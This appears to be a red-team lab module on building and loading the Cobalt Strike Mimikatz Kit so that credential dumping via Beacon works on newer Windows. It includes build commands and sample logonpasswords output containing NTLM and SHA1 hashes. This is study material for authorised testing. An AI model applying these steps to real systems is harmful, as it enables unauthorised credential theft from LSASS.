Mimikatz Kit

You may have noticed instances in the lab where you've tried to run commands such as sekurlsa::logonpasswords and sekurlsa::ekeys, only to receive the following error:

beacon> run hostname
web

beacon> getuid
[*] You are NT AUTHORITY\SYSTEM (admin)

beacon> logonpasswords
ERROR kuhl_m_sekurlsa_acquireLSA ; Logon list

\

This is simply because the version of Mimikatz built into Cobalt Strike by default is not recent enough to work on later versions of Windows such as 11 and Server 2022. The Mimikatz Kit allows you to bring alternate builds of Mimikatz into CS to overcome this limitation.

Confusingly, CS is actually bundled with multiple flavours of Mimikatz in both x86 and x64 builds.

PS C:\Tools\cobaltstrike\arsenal-kit\kits\mimikatz> ls

    Directory: C:\Tools\cobaltstrike\arsenal-kit\kits\mimikatz

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----        05/12/2022     16:57           1046 build.sh
-a----        05/12/2022     16:57         773120 mimikatz-chrome.x64.dll
-a----        05/12/2022     16:57         638464 mimikatz-chrome.x86.dll
-a----        05/12/2022     16:57         813568 mimikatz-full.x64.dll
-a----        05/12/2022     16:57         704000 mimikatz-full.x86.dll
-a----        05/12/2022     16:57        1421824 mimikatz-max.x64.dll
-a----        05/12/2022     16:57        1192960 mimikatz-max.x86.dll
-a----        05/12/2022     16:57         312832 mimikatz-min.x64.dll
-a----        05/12/2022     16:57         276480 mimikatz-min.x86.dll
-a----        05/12/2022     16:57           2661 README.md
-a----        05/12/2022     16:57           1007 script_template.cna

\

The DLLs are custom-built to include a Reflective DLL loader (based on Stephen Fewer's original implementation) and modified code to achieve a smaller file size, which is required to work with Beacon's legacy 1 MB size limit.

The "max" versions include the complete Mimikatz codebase, which can be used with CS 4.6 and above as the 1 MB limit can be removed. The "full" versions have some code stripped out to reduce the file size (although no official documentation seems to exists that explains exactly what is removed); and the "chrome" versions contains code pertinent to Beacon's chromedump command. Again, no documentation seems to exist that states which parts of the Mimikatz codebase this is, but I suspect it's at least dpapi::chrome.

The good news is that the CS dev team are making an effort to keep the version of Mimikatz inside the Mimikatz Kit up-to-date with Benjamin's repo. This means we can simply build the kit as-is and load it into CS. This is as simple as running build.sh and specifying an output directory.

ubuntu@DESKTOP-3BSK7NO /m/c/T/c/a/k/mimikatz> pwd
/mnt/c/Tools/cobaltstrike/arsenal-kit/kits/mimikatz

ubuntu@DESKTOP-3BSK7NO /m/c/T/c/a/k/mimikatz> ./build.sh /mnt/c/Tools/cobaltstrike/mimikatz
[Mimikatz kit] [+] Copying the mimikatz dlls
[Mimikatz kit] [+] Generate the mimikatz.cna from the template file.
[Mimikatz kit] [+] The Mimikatz files are saved in '/mnt/c/Tools/cobaltstrike/mimikatz'

\

Load mimikatz.cna via the Cobalt Strike > Script Manager menu and clicking the Load button. After loading the CNA, Mimikatz will now function as expected.

beacon> logonpasswords

Authentication Id : 0 ; 64753 (00000000:0000fcf1)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 1/15/2023 3:03:57 PM
SID               : S-1-5-90-0-1
	msv :	
	 [00000003] Primary
	 * Username : WEB$
	 * Domain   : DEV
	 * NTLM     : 4b5aff0a96dfb6c6240340a6800e6f11
	 * SHA1     : bd13b64953a55abddf7b9c1bdcc043a9d88fd955